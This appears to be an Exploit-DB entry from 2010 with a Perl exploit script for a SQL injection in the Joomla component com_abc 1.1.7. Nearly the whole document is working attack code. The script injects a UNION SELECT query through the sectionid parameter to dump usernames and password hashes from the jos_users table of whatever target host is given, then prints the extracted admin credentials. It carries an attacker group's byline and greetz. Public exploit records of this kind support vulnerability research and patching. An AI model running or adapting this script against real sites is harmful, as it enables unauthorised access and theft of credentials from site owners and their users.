Joomla! Component ABC 1.1.7 - SQL Injection

EDB-ID:

12429


Platform:

PHP

Published:

2010-04-27

#!/usr/bin/perl

#***********************************************************************#
#                                                                       #
# [o] ABC Joomla Extension SQL Injection Exploit                        #
#      Software : com_abc version 1.1.7                                 #
#      Vendor   : http://www.airiny.com/                                #
#      Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
#      Contact  : public[at]antisecurity[dot]org                        #
#      Home     : http://antisecurity.org/                              #
#                                                                       #
# [o] Usage                                                             #
#      root@evilc0de:~# perl abc.pl www.target.com                      #
#                                                                       #
# [o] Greetz                                                            #
#      Angela Zhang stardustmemory aJe martfella pizzyroot Genex        #
#      H312Y yooogy mousekill }^-^{ noname matthews wishnusakti         #
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11             #
#                                                                       #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia                     #
#                                                                       #
#***********************************************************************#

use HTTP::Request;
use LWP::UserAgent;

my $target = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
print "\n[x]===============================================[x]\n";
print "[x]  ABC Joomla Extension SQL Injection Exploit   [x]\n";
print "[x]            [C]oded By AntiSecurity            [x]\n";
print "[x]===============================================[x]\n\n";

my $exploit = "http://".$target.$file_vuln.$sql_query;

my $request   = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
my $res   = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }